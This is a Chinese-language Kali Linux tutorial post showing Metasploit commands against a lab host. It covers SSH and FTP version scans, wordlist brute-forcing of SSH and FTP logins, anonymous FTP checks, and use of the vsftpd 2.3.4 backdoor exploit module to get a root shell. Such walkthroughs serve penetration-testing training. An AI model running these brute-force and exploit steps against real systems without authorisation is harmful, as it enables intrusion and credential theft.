网络安全Kali之基于SSH、FTP协议收集信息

396 阅读2分钟

基于SSH协议收集信息

查看ssh服务的版本信息
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run

在这里插入图片描述

对SSH暴力破解
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180

设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-
framework/data/wordlists/root_userpass.txt

因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果 新开一个终端窗口

┌──(root💀xuegod53)-[~]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

回到MSF终端

msf6 auxiliary(scanner/ssh/ssh_login) > run

在这里插入图片描述

因为我们是在文件的最后添加的,所以前面的都是失败的操作。

基于FTP协议收集信息

查看ftp服务的版本信息

加载ftp服务版本扫描模块

msf6 > use auxiliary/scanner/ftp/ftp_version

查看设置参数

msf6 auxiliary(scanner/ftp/ftp_version) > show options

在这里插入图片描述

设置目标IP,可以设置多个

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180

执行扫描,输入exploit 或 run

msf6 auxiliary(scanner/ftp/ftp_version) > run

在这里插入图片描述

扫描出结果是:vsFTPd 2.3.4

msf6 auxiliary(scanner/ftp/ftp_version) > back

扫描出ftp服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块

msf6 > search 2.3.4

在这里插入图片描述

或者搜索 vsftpd

msf6 > search vsftpd

在这里插入图片描述

我们发现存在一个exploit模块,而且这个版本的ftp服务存在一个后门

我们尝试利用下这个模块

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

在这里插入图片描述

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

在这里插入图片描述

拿到了shell,而且是root权限,我们尝试执行下命令

执行 id 命令, 查看当前用户

在这里插入图片描述

执行 ifconfig 命令,查看IP地址

在这里插入图片描述

ftp匿名登录扫描
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) show options

在这里插入图片描述

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run

在这里插入图片描述

ftp暴力破解
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options

在这里插入图片描述

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180

设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。

msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-
framework/data/wordlists/root_userpass.txt

因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果 新开一个终端窗口

┌──(root💀xuegod53)-[~]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

回到MSF终端

msf6 auxiliary(scanner/ftp/ftp_login) > run

在这里插入图片描述

因为我们是在文件的最后添加的,所以前面的都是失败的操作。